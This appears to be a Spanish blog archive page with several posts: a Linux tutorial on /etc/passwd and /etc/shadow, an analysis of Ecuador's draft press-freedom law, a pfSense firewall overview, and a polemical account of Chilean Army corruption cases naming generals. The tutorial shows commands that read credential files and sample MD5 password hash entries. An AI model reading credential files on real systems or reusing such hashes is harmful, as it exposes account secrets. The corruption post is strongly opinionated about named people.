El nombre del archivo se origina en una de sus funciones iniciales. Este contenía los datos utilizados para verificar las contraseñas de las cuentas de los usuarios. Sin embargo, en los sistemas Unix modernos, la información de la contraseña se suele almacenar en un archivo diferente, utilizando contraseñas ocultas u otras implementaciones de bases de datos.

Se puede decir que el archivo /etc/passwd es una base de datos basada en texto sin formato, la cual contiene información sobre todas las cuentas de usuarios que se encuentran el sistema. Como decíamos, es propiedad de root, y aun que solo es modificable por root o usuarios con privilegios de sudo, también es legible por los demás usuarios del sistema.

¿Qué es el archivo /etc/passwd?

Una característica a destacar, es que se trata de un archivo simple de texto ASCII. Este es un archivo de configuración que contiene detalles relativos a las cuentas de usuarios. Identificar a los usuarios de forma única es esencial y necesario en el momento del inicio de sesión, y ahí es justo dónde los sistemas GNU/Linux utilizan /etc/passwd.

  • /etc/passwd Información de configuración sobre las cuentas de usuario del sistema.
  • /etc/shadow Contraseñas de las cuentas de usuario
  • /etc/group Información sobre los grupos del sistema.

En este archivo de texto sin formato encontraremos una lista de las cuentas del sistema, guardando de cada cuenta información útil como ID de usuario, ID de grupo, directorio de inicio, shell y más. Además, este debe tener permiso de lectura general, pues muchas utilidades de comandos lo utilizan para asignar un ID de usuario a los nombres de usuario.

Aunque es posible agregar y administrar usuarios directamente en este archivo, no es recomendable hacerlo, ya que esta acción puede añadir errores, lo cual sería un problema. En lugar de hacerlo así, lo suyo es utilizar los comandos disponibles para la administración de usuarios.

¿Cuál es el uso de este archivo?

Existen varios esquemas de autenticación diferentes que se pueden usar en sistemas GNU/Linux. El esquema estándar más utilizado es realizar la autenticación en los archivos /etc/passwd y /etc/shadow. En el archivo /etc/passwd se almacena la lista de usuarios del sistema junto con información importante sobre estos. Gracias a este archivo el sistema puede identificar a los usuarios de forma única, pues esto es esencial y necesario en el momento de iniciar la sesión correspondiente de forma correcta.

El contenido del fichero /etc/passwd determina quien puede acceder al sistema de manera legitima y que puede hacer una vez dentro. Es por esto que este archivo quizás pueda ser considerado como la primera linea de defensa del sistema para evitar los accesos no deseados. Por este motivo, es importante mantenerlo libre de errores y fallos.

Formato del archivo /etc/passwd

En el contenido de este archivo, nos vamos a encontrar el nombre de usuario, el nombre real, la información de identificación y la información básica de la cuenta de cada usuario. Como decíamos, este es un archivo de texto con una entrada por línea, y cada una de estas líneas representa una cuenta de usuario.

Para ver su contenido, los usuarios podemos utilizar un editor de texto o un comando como el siguiente:

cat /etc/passwd

Cada línea del archivo /etc/passwd va a contener siete campos separados por puntos (:). Normalmente, la primera línea describen al usuario root, seguido del sistema y las cuentas de usuario normales. Las nuevas entradas se van añadiendo al final.

/etc/passwd contiene una entrada por línea para cada usuario (cuenta de usuario) del sistema. Todos los campos están separados por un (:). Total de siete campos de la siguiente manera. En general, la entrada del archivo /etc/passwd tiene el siguiente aspecto:

Valores del archivo /etc/passwd

A continuación vamos a ver qué significa cada uno de los valores que nos vamos a encontrar en cada una de las líneas del fichero /etc/passwd:

  • Nombre de usuario→ Este se utiliza cuando el usuario inicia sesión. Debe tener entre 1 y 32 caracteres de longitud.
  • Contraseña→ El carácter x nos va a indicar que la contraseña cifrada se almacena en el archivo /etc/shadow.
  • ID de usuario (UID)→ A cada usuario se le asigna un ID de usuario (UID) unívoco en el sistema. El UID 0 está reservado para root y los UID 1-99 están reservados para otras cuentas predefinidas. El sistema va a reservar otros UID del 100 al 999 para cuentas/grupos administrativos y del sistema.
  • ID de grupo (GID)→ Este es el ID del grupo principal al que pertenece el usuario (almacenado en el archivo /etc/group).
  • Información del usuario (GECOS)→ Aquí encontraremos el campo de comentario. En este se permite añadir información adicional sobre los usuarios, como son el nombre completo, el número de teléfono, etc.
  • Directorio de inicio→ Aquí nos encontraremos con la ruta absoluta al directorio “home” del usuario. Si este directorio no existe, el directorio de usuarios se convierte en el directorio raíz.
  • Ruta al intérprete de comandos→ El intérprete de comandos es el software ejecutado por el emulador de comandos (terminal o consola) para traducir los comandos u órdenes ingresadas por el usuario para dirigirlas al núcleo del sistema operativo, y en este campo se encuentra la ruta absoluta al binario ejecutable del intérprete correspondiente que se encuentre instalado y configurado para el respectivo usuario en disputa. No obstante, podría no ser un intérprete como tal. Si el intérprete se establece en /sbin/nologin y el usuario intenta iniciar sesión en el sistema GNU/Linux directamente, el intérpete /sbin/nologin cerrará la conexión

Como hemos dicho líneas más arriba, a excepción de la contraseña, con cualquier editor de textos como «vim» o «gedit» y privilegios de «root» podremos cambiar el comportamiento y configuración de todos los usuarios almacenados en «/etc/passwd». Sin embargo, también es necesario insistir en que, modificar este archivo no se debe hacer salvo un caso excepcional (y sabiendo lo que se hace), pues si se corrompe o borramos algo en un despiste, nos podemos encontrarnos ante una catástrofe, pues en este archivo se encuentra la raíz básica de todos los permisos que usamos y usaremos en el sistema.

A. Permiso del archivo /etc/passwd

Debido a que /etc/passwd es muy importante para los sistemas GNU/Linux, su permiso predeterminado es 644 para evitar modificaciones erróneas, de modo que cualquier usuario solo pueda leer el archivo y solo el usuario root pueda editarlo. De esta forma, podemos visualizar el permiso del susodicho fichero mediante el comando a continuación:

# ls -l /etc/passwd
-rw-r--r-- 1 root root 1501 Feb 24 12:00 /etc/passwd

B. Cómo funciona el comando passwd

Es posible cambiar su propia contraseña o la contraseña asignada a un usuario con /usr/bin/passwd mando. Puede obtener el permiso de este comando a continuación:

ls -l /usr/bin/passwd
-rwsr-xr-x. 1 root root 27832 Jun 10 2014 /usr/bin/passwd

Puede ver que el usuario y el propietario del grupo son root con permisos de lectura y ejecución también para los demás usuarios. Aunque es propiedad de root, puede ver el Bit SETUID representado por el s permiso que permite a los usuarios ejecutar un programa como si fueran el usuario propietario del programa (root en nuestro caso). Es por eso que puede usar este comando para cambiar su contraseña incluso si no es un usuario root.

Para cambiar su propia contraseña, simplemente ingrese el comando passwd sin opción:

$ passwd
Changing password for anon
(current) UNIX password:
New password:

Ten en cuenta que, si puede cambiar su propia contraseña sin privilegios de root, no puede cambiar la contraseña de un usuario sin ella.

$ passwd anon
passwd: Only root can specify a user name

Contraseñas se almacenan en el archivo /etc/shadow

Las contraseñas cifradas no se almacenan en el archivo /etc/passwd. Se almacena en el archivo /etc/shadow. En los viejos tiempos no había un gran problema con este permiso de lectura general. Todos podían leer las contraseñas cifradas, pero el hardware era demasiado lento para descifrar una contraseña bien elegida y, además, la suposición básica solía ser la de una comunidad de usuarios amigable.

Casi todos los sistemas operativos modernos de línea Linux/UNIX utilizan algún tipo de conjunto de contraseñas ocultas, donde /etc/passwd tiene asteriscos (*) en lugar de contraseñas cifradas, y las contraseñas cifradas están en /etc/shadow, que el superusuario puede leer solamente.

Fichero /etc/shadow

El fichero /etc/shadow almacena las contraseñas de las cuentas de usuario. Se utiliza este fichero por seguridad. /etc/shadow es un archivo de texto que contiene información sobre las contraseñas de los usuarios del sistema. Es propiedad del usuario root y del grupo oculto y tiene 640 permisos.

Esto es debido a que es necesario que cualquier usuario pueda leer información de cuentas de usuario, que se almaenan en /etc/passwd. Si las contraseñas se almacenaran en el fichero /etc/passwd, cualquier usuario del sistema tendría acceso a las contraseñas (cifradas).

La solución, guardar las contraseñas en un fichero al que solo puede acceder el usuario root.

javier@smr01Profesor:~$ cat /etc/shadow
cat: /etc/shadow: Permiso denegado
javier@smr01Profesor:~$ sudo cat /etc/shadow 

En efecto, se puede apreciar el fichero /etc/shadow de la siguiente manera:

pepito:$1$GeYcB$uo.yrKAWYXffHcQqkn.a1.:14715:0:99999:7:::
pepita:$1$b9lwK1t0$7CguRqM2yin72JKKRC/n70:14715:0:99999:7:::
maria:$1$Rxr4IClP$ruhdnFzF40gDLtTPZFe5F.:14718:0:99999:7:::
ramon:$1$on5bv0Gu$qWLrJ7Fp8Y/Umazwe8Ifo/:14718:0:99999:7:::

Si queremos obtener información sobre lo que almacena /etc/shadow, consultamos su página de manual.

Algoritmo de cifrado y estructura de /etc/shadow

La contraseña debe tener un mínimo de 8 a 12 caracteres, incluidos caracteres especiales, dígitos, minúsculas alfabéticas y más. Por lo general, el formato de la contraseña se establece en $id$salt$hashed. El $id es el algoritmo utilizado en GNU/Linux de la siguiente manera:

$1$ – MD5
$2a$ – Blowfish
$2y$ – Eksblowfish
$5$ – SHA-256
$6$ – SHA-512

1: MD5
2a: Blowfish
2y: Eksblowfish
5: SHA-256
6: SHA-512

El formato básico del fichero es el siguiente:

  • Nombre de usuario: (Obligatorio) Identifica al usuario para el que se almacena la contraseña.
  • Contraseña cifrada: Contraseña cifrada del usuario.
  • Información de edad: El resto de campos almacena información para gestionar la caducidad de las contraseñas.

Aquí hay una lista de comandos:

passwd command
su command
sulogin command
getent command
login command
pwck command
pwunconv command
chpasswd command
chsh command
chfn command
useradd command
serdel command 

Suponemos que se ha creado, pero podemos comprobarlo de varias formas. La más directa sería con el comando id seguido del nombre del usuario recién creado.

$ id anon

Fuentes:
Ubunlog: /etc/passwd, ¿qué es este archivo y para que sirve?
Linux en Español: /etc/passwd: Descripción de funcionamiento y formato

4 comentarios

Ecuador hacia una nueva ley de libertad de prensa, opinión y expresión

Publicada el 24/02/2022 - 20/02/2022 por Anonymous Chile

Ecuador está por eliminar la legislación que permitió el hostigamiento y sanciones a periodistas durante nueve años. Una nueva propuesta de ley para la libertad de prensa, opinión y expresión se está debatiendo en la Asamblea Nacional. ¿Cuáles son los principales elementos de este proyecto? ¿Dónde queda el componente digital?

El 11 de enero de 2022, la Asamblea Nacional de Ecuador llevó a cabo el primer debate sobre el Proyecto de Ley Orgánica para la Garantía, Promoción y Protección de la Libertad de Prensa, de Opinión, de Expresión y de la Comunicación. Esta propuesta surgió como  necesidad de derogar la Ley Orgánica de Comunicación (LOC), herramienta para la persecución y hostigamiento a medios de comunicación y periodistas desde 2013. En contraste, la nueva propuesta hace el intento por acercarse a los estándares internacionales y regionales de derechos, aunque quedan elementos por clarificar y plausibles de mejora.

El nuevo proyecto se encuentra en proceso de ajuste por la Comisión de Relaciones Internacionales y Movilidad Humana de la Asamblea, para ser debatido por segunda vez en el pleno. En este marco, se realizan una serie de reflexiones sobre los principales elementos del texto y promueven un análisis sobre el componente “digital”.

Alcance del proyecto: una ley de medios

El primer punto a precisar es el alcance de esta ley. De acuerdo con el texto, el objeto es “garantizar, promover y defender el ejercicio de las libertades de prensa, de opinión, de expresión y, los derechos de información y comunicación”, tal como se establece en el artículo 1. Aunque la libertad es la meta final, este proyecto es una legislación que regula los medios de comunicación, tanto tradicionales como digitales, por lo que resulta vital definir principios, actores y procesos adecuados.  

En la misma línea de importancia, se encuentra clarificar quiénes serán objeto de los derechos y obligaciones. El artículo 4 del proyecto carece de criterios y definición de medios digitales y tradicionales. Se presta especial atención en los medios digitales porque la connotación “digital” conlleva diversos significados, especialmente, en un contexto de alta conectividad a internet, donde se promueven distintas formas de circulación de la información. Cabe resaltar que la elaboración de una definición debe ser cuidadosa, pues una mala aproximación podría tener consecuencias negativas y usarse en la práctica para extender control de forma arbitraria.

Libertad de expresión en internet

En el artículo 4, es señalado el derecho a recibir información “veraz, verificada, oportuna, contextualizada”, lo que estaría representando condicionamientos sobre la información, como fue expresado por la organización Fundamedios. Sin embargo, garantizar la libertad de expresión implica eliminar toda condicionante, tal como lo expresa el principio 7 de la Declaración de Principios sobre Libertad de Expresión de la Comisión Interamericana de Derechos Humanos. El flujo de la información de forma libre es indispensable, tanto en espacios físicos como digitales.

En términos de libertad de expresión en internet, este proyecto la instaura como un principio en su artículo 5. Asimismo, establece la promoción de acceso a internet para toda la ciudadanía. En este sentido, se debe resaltar que no solo la libertad de expresión, sino todos los derechos humanos que las personas tienen fuera de línea deben protegerse dentro de ella, tal como lo ha reconocido el Consejo de Derechos Humanos de las Naciones Unidas.

Además, se observa que el debate tiene que ser profundizado desde una perspectiva de género en el artículo 5. Tal como lo sistematiza el informe de la Relatora Especial de la ONU para la Libertad de Expresión, Irene Khan, las mujeres periodistas se enfrentan a retos como la censura o la violencia en línea por razón de género, entre muchos otros, por lo que se vuelve prioritario buscar el cierre de brechas que se han construido de manera sistemática.

Neutralidad de la red y censura en línea

En el mismo artículo 5, es una señal favorable la mención sobre la neutralidad de la red. No se considera que este proyecto deba profundizar más —por tratarse de un principio que trasciende a su ámbito— pero sí se vislumbra como una oportunidad para inspirar una normativa más amplia.

El artículo 11 prohíbe “cualquier tipo de censura” en internet por parte del Estado ecuatoriano, pero no está explicitado qué se entiende como tal, lo que resulta preocupante debido a los antecedentes en varios gobiernos en el mundo en coartar la libertad de expresión de forma directa o indirecta. Algunos ejemplos son: cortes de internet en contextos de manifestaciones sociales, cierres de medios digitales, amenazas en línea y nuevas leyes contra ciertas expresiones en internet. Asimismo, en internet conviven distintos grupos involucrados en las etapas que la hacen posible, tal es el caso de las empresas intermediarias de conexión y las plataformas, quienes también pueden verse impactadas si no hay reglas claras.

 La real malicia en el ámbito digital

Por otro lado, se utiliza el término de real malicia como factor que permite la responsabilidad de los medios por las expresiones usadas en ellos, de lo que surgen varias reflexiones.

En primer lugar, la real malicia es, en principio, razonable como una exigencia especial para la procedencia de la persecución penal, porque dificulta la persecución de medios y periodistas, pero es necesario contar con una definición clara. El proyecto de ley no brinda una redacción que precise los requisitos y límites de dicha exigencia, lo que termina siendo redundante con la regulación de los delitos. Es decir, es una garantía contra la persecución a los medios, que incluso la jurisprudencia de la Corte Interamericana de Derechos Humanos (CIDH) ha reconocido en varios casos, pero que debe ser precisada. Razón por la cual se sugiere ampliar este debate en la Asamblea ecuatoriana. 

En segundo lugar, se reafirma la necesidad de delimitar los medios sujetos a regulación en consideración de los medios digitales, pues se corre el riesgo que cualquier publicación, incluso en redes sociales, pueda ser objeto de persecución, entendiendo que la sola judicialización, aunque termine en absolución, representa un alto costo para periodistas y medios independientes.

Finalmente, el Código Penal del país establece a la calumnia como un delito contra el derecho al honor y buen nombre. Si bien en caso de aprobarse esta ley se modificaría el Código para que no haya responsabilidad penal para quienes hablen sobre el desempeño o gestión de funcionarios públicos, seguiría habiendo sanción penal por imputación de delito.

Protección a periodistas incluyendo la perspectiva de género

La legislación pondría en marcha al Consejo de Comunicación (CC), un órgano público cuyas funciones serían de garantía de los derechos, capacitación, investigación, creación de indicadores y protección de periodistas. En este sentido, se enfatiza la necesidad de autonomía e independencia de este organismo, así como contar con el financiamiento adecuado para su operación. Además, se hace un llamado a que incluya procesos participativos con la diversidad de actores.

La protección a profesionales de la comunicación es un tema fundamental que queda ambiguo en el proyecto de ley. No se logra percibir qué acciones implementará el CC para la protección de la vida de periodistas, tampoco se identifica una lista completa de actividades de riesgo en el artículo 27. El primer paso es el reconocimiento legal de la protección, luego queda lo más importante: diseñar una ruta de acciones adecuadas para ello.

Un ejemplo de ruta de acción adecuada, sería un mecanismo de protección con enfoque de género y reconociendo la violencia en línea que puede traducirse en la violencia en espacios físicos. En un contexto regional y nacional de violencia creciente y a menudo dirigida contra comunicadoras, esas medidas son cruciales.

Además, sería interesante que la figura del “Defensor de audiencia” (que incluye el proyecto como intermediaria entre el medio y las audiencias) no sea una medida obligatoria para los medios comunitarios, incluidos los medios digitales, sino una decisión voluntaria para que no afecte su sostenibilidad y permanencia.

Consideraciones finales

Una futura ley de libertad de prensa, de opinión y de expresión debe tener en cuenta que los estándares internacionales de derechos humanos son la guía para elaborarla legislación, y que los derechos fuera de línea también tienen que adjudicarse a los espacios en línea. 

Sin dudas, la Asamblea Nacional se encuentra en un punto clave. Este segundo debate que está en puerta, representa una gran oportunidad para retomar los aportes de la sociedad civil, periodistas, academia y todos los sectores involucrados. El objetivo central es construir una ley que incorpore una perspectiva de derechos humanos. Sería un avance fundamental en Ecuador donde por años se ha perseguido periodistas y medios. Ya es momento de garantizar las libertades de quienes comunican y de la sociedad ecuatoriana en su conjunto.

2 comentarios

Monitorización y administración de redes con pfSense

Publicada el 23/02/2022 - 24/02/2022 por Anonymous Chile

pfSense es el sistema operativo orientado a firewall (cortafuegos) más utilizado a nivel profesional, tanto en el ámbito doméstico con usuarios avanzados, como en pequeñas y medianas empresas para segmentar su red correctamente y disponer de cientos de servicios disponibles. pfSense está basado en el popular sistema operativo FreeBSD, pero pfSense dispone de una interfaz gráfica web realmente completa y muy intuitiva. Por su parte IPFire es un sistema operativo basado en Linux cuya función principal es la de firewall (cortafuegos) y también de router dentro de una red. Si necesitas un firewall muy profesional, con posibilidad de añadirle extensiones para aumentar sus funcionalidades, y todo ello bajo un sistema operativo Linux basado en Debian.

Gracias a la posibilidad de instalar software adicional, podremos disponer de un potente IDS/IPS (Sistema de Detección y Prevención de Intrusiones) como Snort o Suricata. Para usar pfSense es obligatorio disponer de dos tarjetas de red, una para la WAN de Internet y otra para la LAN, aunque si disponemos de más tarjetas (o una tarjeta con varios puertos) mucho mejor, porque podremos disponer de interfaces físicas adicionales para configurar una DMZ, una red adicional y mucho más.

pfSense es una distribución personalizada de FreeBSD adaptado para su uso como Firewall y funciones router. Se caracteriza por ser de código abierto, puede ser instalado en una gran variedad de ordenadores, y además cuenta con una interfaz web sencilla para su configuración.

pfSense es una distribución de software libre para routers y firewalls está basada en el sistema operativo estilo UNIX FreeBSD. La primera versión fecha de 2006 y nació de un fork de m0n0wall, la empresa NetGate es quien se encarga de su desarrollo además de ofrecer dispositivos con pfSense instalado.

Mediante lo uso de pfSense se puede instalar y configurar un router profesional con las características que frecuentan tener estos dispositivos comerciales, incluso con más funcionalidades y con la posibilidad de implementar otras gracias a ser este software libre. La instalación puede realizarse en un equipo existente o nuevo teniendo en cuenta la guía de selección de hardware o también se puede comprar un equipo con pfSense preinstalado. La configuración puede realizarse a través de una interfaz web mediante a cuál se pueden activar y configurar los servicios de VPN, portal cautivo, firewall, NAT, DNS, DHCP, VLANs y diversas opciones de seguridad.

El equipo de desarrollo del popular sistema operativo orientado a firewall, pfSense, ha lanzado mismo una nueva actualización tanto en su rama de «Community Edition» CE con la nueva versión de pfSense 2.6.0. como también en la versión pfSense Plus con la versión pfSense Plus 22.01.

  • Mejoras en IPsec
  • Sistema de archivos predeterminado será ZFS

pfSense es el sistema operativo orientado a firewall (cortafuegos) más utilizado a nivel profesional, tanto en el ámbito doméstico con usuarios avanzados, como en pequeñas y medianas empresas para segmentar su red correctamente y disponer de cientos de servicios disponibles. pfSense está basado en el popular sistema operativo FreeBSD, por tanto, tendremos la garantía de que es un sistema operativo estable, robusto, y, sobre todo, muy seguro. A diferencia de otros firewalls, pfSense dispone de una interfaz gráfica realmente completa y muy intuitiva,

Herramientas PfSense

  • arpwatch: Para que nos notifique por email o Telegram qué equipos nuevos se han conectado
  • bandwidthd: Para ver gráficos de utilización del ancho de banda
  • freeradius3: Para montar un servidor de autenticación RADIUS, ideal para configurar APs WiFi y disponer de WPA2/WPA3-Enterprise
  • iperf: Para medir el ancho de banda al pfSense y desde él
  • nmap: Para realizar escaneo de puertos
  • pfBlocker-ng: Para bloquear toda la publicidad, y también dominios y direcciones IP maliciosas
  • Snort y Suricata: Los dos IDS/IPS por excelencia, no vienen por defecto pero se puede instalar
  • Haproxy: Para balanceador
  • Squid: Para montar un servidor proxy.
  • nut: Para monitorizar sistemas SAI
  • Agente zabbix: Para integrarlo fácilmente en un sistema de monitorización
  • Zeek: (Antiguo Bro IDS)

Firewall y IDS/IPS

pfSense emplea un cortafuegos SPI (Stateful Packet Inspection) basado en reglas, como suele ser habitual. Podremos filtrar paquetes rápidamente de manera muy avanzada, dependiendo del hardware, podremos conseguir anchos de banda superiores a los 10Gbps. Gracias a la interfaz gráfica de usuario, podremos crear «alias» para crear grupos de IPs y puertos, para posteriormente aplicarlo a las reglas, y de esta forma, no tener cientos de reglas en el firewall, es muy importante saber qué estamos filtrando y mantener las reglas correctamente actualizadas. Por supuesto, pfSense dispone de avanzados registros de si una regla se ha ejecutado, y de todo lo que está ocurriendo en el sistema operativo.

pfSense no solamente dispone de un potente firewall para mitigar y/o bloquear los ataques DoS y DDoS, sino que también dispone de un avanzado IDS/IPS como Snort y Suricata, los cuales podremos instalar de manera fácil y rápida a través de los paquetes disponibles para su instalación, y en ambos tendremos interfaz gráfica de usuario para configurar las diferentes interfaces donde deben actuar, así como todas las reglas que tenemos para detectar posibles ataques. También podremos detectar fugas de información e incluso actividad sospechosa en la red que podremos bloquear. Por supuesto, también tenemos la posibilidad de ver en tiempo real el estado del sistema operativo, e incluso instalar software adicional para ver informes gráficos avanzados y conocer todo lo que ocurre en el sistema.

VPN

Las redes privadas virtuales (VPN) siempre suelen colocarse en el propio firewall, para no tener
problemas con la NAT y el filtrado de otros firewalls. Disponer de un servidor VPN o cliente VPN, nos permitirá interconectar ubicaciones remotas a través de Internet de forma segura, y también conectar diferentes dispositivos a la red local en modo VPN de acceso remoto. pfSense incorpora diferentes tipos de VPN para adaptarse perfectamente a las necesidades de los usuarios:

  • L2TP/IPsec
  • IPsec IKEv1 y IKEv2, con diferentes tipos de autenticación como Mutual-PSK, Mutual-RSA e incluso Xauth.
  • OpenVPN con autenticación por certificados digitales, credenciales de usuario y más.
  • WireGuard

Lo más destacable de pfSense 2.5.0 es la incorporación de la popular VPN WireGuard, tanto para conectar usuarios de forma remota, como para hacer túneles Site-to-Site de forma rápida y fácil, gracias a este nuevo protocolo que se ha integrado en el kernel y nos proporcionará un gran rendimiento.

Otras características

pfSense incorpora una grandísima cantidad de servicios, los mismos o más que los routers y otros firewalls profesionales. Por ejemplo, algunas de las principales características adicionales son la posibilidad de configurar un servidor DNS con DNS Resolver, ideal para que sea el propio firewall quien resuelva todas las peticiones, también disponemos de un completo servidor DHCP con decenas de opciones avanzadas, un servidor NTP para servir la hora a diferentes dispositivos, WoL, QoS para priorizar diferentes equipos, Traffic Shaper, compatibilidad con VLANs, posibilidad de configurar diferentes VLANs en una o varias interfaces, posibilidad de configurar QinQ, Bridge y LAGG con diferentes opciones avanzadas, también podemos usar el servidor Dynamic DNS y mucho más. No debemos olvidar que, al ser un sistema operativo muy avanzado, podremos ver un completo registro de todo lo que está ocurriendo, e incluso tendremos avisos por email o Telegram para estar al tanto de todo lo que ocurra.

Una de las características más importantes, es la posibilidad de instalar paquetes adicionales para disponer de aún más funcionalidades, gracias a este software adicional, podremos ampliar las funcionalidades de este firewall profesional. Algunos de las extensiones más populares son las siguientes:

  • arpwatch: Para que nos notifique por email o Telegram qué equipos nuevos se han conectado. Esta funcionalidad es muy interesante para tener bajo control qué equipos se conectan, nos aparecerá la dirección IP asignada, la dirección MAC y también la dirección del hostname del equipo, y todo ello con avisos en tiempo real para evitar posibles intrusos.
  • bandwidthd: Para ver gráficos de utilización del ancho de banda, aunque los gráficos no son demasiado «buenos» estéticamente, sí es cierto que nos será muy útil para poder ver el ancho de banda que estamos consumiendo en cada interfaz física o lógica del firewall.
  • freeradius3: Para montar un servidor de autenticación RADIUS, ideal para configurar APs WiFi y disponer de WPA2/WPA3-Enterprise. La implementación de FreeRADIUS en pfSense es completa, disponemos de todas las opciones de configuración existentes, además, podremos hacer cualquier configuración a través de la interfaz gráfica de usuario, sin necesidad de configurar archivos de texto a modo de archivo de configuración.
  • iperf: Para medir el ancho de banda al pfSense y desde él. La incorporación de iperf es la versión iperf3, por tanto, podremos comprobar el ancho de banda que es capaz de gestionar entre las diferentes VLANs, es decir, la velocidad del tráfico inter-vlan.
  • nmap: Para realizar escaneo de puertos a equipos remotos, generalmente este software está disponible en sistemas operativos orientados a la ciberseguridad y pentesting, pero lo tenemos disponible para hacer nuestras propias pruebas directamente desde aquí.
  • pfBlocker-ng: Para bloquear toda la publicidad, y también dominios y direcciones IP maliciosas
  • Snort y Suricata: Los dos IDS/IPS por excelencia, no vienen por defecto pero se puede instalar
  • Haproxy: Para balanceador
  • Squid: Para montar un servidor proxy.
  • nut: Para monitorizar sistemas SAI
  • Agente zabbix: Para integrarlo fácilmente en un sistema de monitorización
  • Zeek: (Antiguo Bro IDS)

pfSense funciona en arquitectura x86, siendo compatible con CPU recientes de 64 bits, además, se puede instalar en casi cualquier plataforma en la nube como Amazon Cloud, Azure y más, además, debemos tener en cuenta que hoy en día podemos comprar equipos del fabricante Netgate que ya vienen con pfSense preinstalado, con equipos orientados a ámbito profesional.

Requerimientos mínimos de hardware pfSense Firewall

  • Procesador 600Mhz (mas es mejor) de 64Bits
  • 512Mb RAM (mas es mejor)
  • 4Gb disco (mas es mejor)
  • 2 tarjetas de red (mínimo WAN y LAN)
  • Puerto USB o DVD para instalación del ISO
  • Conectividad a internet

Fuentes:

Configura pfSense para proteger tu hogar o empresa con este firewall

74 comentarios

Historia secreta de la maquinaria militar de corrupción del Ejército de Chile

Publicada el 22/02/2022 - 20/02/2022 por Anonymous Chile

Desde Augusto Pinochet en adelante, con excepción de Ricardo Izurieta, todos los comandantes en jefe del Ejército han sido requeridos o apuntados por los tribunales de justicia por causas relacionadas con torturas, homicidios, blanqueamiento de dinero, fraudes, etcétera, dando cuenta, por ende, al resto de la sociedad, que este cuerpo armado se ha transformado, qué duda cabe, en una colosal e impenitente máquina delictual. Pasemos revista, entonces, a los escandalosos ilícitos que han salido a la luz pública desde el retorno a la democracia, comenzando previamente y grosso modo con el indecoroso palmarés de algunos generales en jefe de esta institución, para luego bucear en los escándalos más rimbombantes, en términos generales.

Juan Emilio Cheyre

“¿Excusa el escenario de conflicto global ya descrito (Guerra Fría y Golpe de Estado) las violaciones a los derechos humanos ocurridas en Chile? Mi respuesta es una e inequívoca: no. Las violaciones a los derechos humanos nunca y para nadie pueden tener justificación ética”. Con esas palabras, en 2004, Cheyre se encumbró como el general del nunca más, por medio de una columna en La Tercera, titulada Ejército de Chile: el fin de una visión. Esa imagen cambió radicalmente en noviembre de 2018, cuando el ministro en visita, Mario Carroza, sentenció al excomandante en jefe del Ejército a 3 años y 1 día de libertad vigilada por el encubrimiento de 15 homicidios calificados en el denominado Caso Caravana de la Muerte en 1973, durante la dictadura militar de Augusto Pinochet. A ello se sumó una nueva causa conducida por el ministro en visita Vicente Hormazábal, que lo procesaría -junto a otros dos generales- como presunto coautor de la “aplicación de tormentos” a 24 presos políticos de La Serena, tras el golpe militar.

Óscar Izurieta

En total, 584 oficiales y suboficiales de la institución son potenciales imputados en una indagatoria que poco a poco comenzó a tomar fuerza durante 2018, denominada Caso FAM. Aunque tuvo un inicio incipiente: las sospechas de fraude en el Fondo de Ayuda Mutua (FAM) comenzaron gracias a una auditoría de la Contraloría General de la República (CGR), que detectó gastos improcedentes por 660 millones de pesos en las instalaciones del Ejército en Coyhaique. Ahí salieron a la luz viáticos adulterados, comisiones de servicios falsas, gastos de representación irregulares y pagos por servicios inexistentes que tenían su origen en una inusual forma de recompensar a los beneficiarios del FAM de oficiales y suboficiales, que se encontraba en quiebra. los antecedentes apuntan al general en retiro Óscar Izurieta, que cuando se enteró en 2006, al asumir el mando, comenzó a buscar una solución. Así, en 2008, según admitió en su declaración como testigo a la Fiscalía (2018), inició el desvío de recursos presupuestarios -cuyo modelo se mantuvo vigente hasta 2016- y decidió devolver parte de la plata a través de viáticos y trabajos que nunca se realizaron: enviando a los afectados a la Misión de Paz en Haití, extendiendo el cese de sueldos tras el retiro o manteniendo a los suboficiales hasta el máximo permitido, entre otros métodos.

Por otro lado, la ministra en visita Romy Rutherford, quien investiga de forma exclusiva las aristas asociadas al fraude en el Ejército, lo sometió este lunes a proceso como autor de malversación de caudales públicos y falsedad de documento militar por el uso de gastos reservados de la institución.

En esta etapa procesal, la magistrada responsabilizó a Izurieta del mal uso de fondos asignados a la institución por un monto total 6.374.996.162 pesos, que corresponden al periodo entre marzo de 2006 y marzo de 2010 y que fueron actualizados a la fecha.

Rutherford ordenó también el embargo de bienes por un monto total de 6.500 millones de pesos al general en retiro, y su ingreso en prisión preventiva en el Batallón de Policía Militar de Peñalolén.

En tanto, sobre su responsabilidad en la falsedad de documento público, la resolución indicó que el excomandante en jefe mintió en “las rendiciones de cuenta, declaraciones juradas y sus anexos, respecto de los gastos reservados correspondientes a los ejercicios presupuestarios de los años 2006, 2007, 2008 y 2009 que fueron remitidas al Contralor General de la República de la época“.

Esta era la única exautoridad castrense que no había sido procesada en el marco de las aristas del caso, que ya mantiene procesados a altos mandos de la institución por el presunto desvío de dinero, proveniente de gastos reservados.

Izurieta entró al foco de Rutherford luego de que dos testigos claves que manejaban las remesas de gastos reservados -que lideró el imputado entre el 2006 y el 2010- lo nombraran en sus declaraciones: ellos son el coronel Sergio Vásquez y quien lo antecedió en finanzas, Jorge Cortés.

Además, aparece mencionado en la declaración del general en retiro Fuente-Alba, quien confirmó el pago de 800 mil pesos mensuales a excomandantes en jefe, donde uno de los receptores sería el propio Óscar Izurieta.

El Consejo de Defensa del Estado, mediante la consejera María Inés Horvitz, reveló que Izurieta “se despojó de todos sus bienes” en 2021, por un cáncer y melanoma que no justificó con documentos, según publica El Mercurio.

En detalle, realizó separación de bienes y repartió inmuebles con sus dos hijas, equivalentes a $ 400 millones a cada una, y con su cónyuge, debido a “razones de salud” no acreditadas. A raíz de esta situación, la fiscal regional Metropolitano Oriente, Lorena Parra, aceptó este viernes 18 de febrero la renuncia del fiscal Andrés Iturra a la jefatura de la Fiscalía Local de Las Condes, luego de que se abriera una investigación en su contra y la de su cónyuge, María Constanza Izurieta (también fiscal), yerno e hija de Óscar Izurieta, respectivamente, por un eventual lavado de activos.

La jueza detalló que Izurieta indicó ser parte del desvío de dineros que tenían como fin actividades de inteligencia, asegurando que eran ocupadas para costear actividades ajenas a la institución, entre ellas los requerimientos de la familia de Augusto Pinochet.

En su testimonio ante la jueza, Izurieta detalló que “en sus primeros años parte de los recursos de gastos reservados iban al general Pinochet y su familia”, afirmando que el dictador “gastaba mucha plata, porque era una persona que mucha gente hubiese querido que muriera antes de su muerte natural“.

El procesamiento plantea también que estos altos gastos se debían a que, por la intención de cuidar a Pinochet, había que “tener personal a su disposición, como médicos, enfermeros, escoltas“.

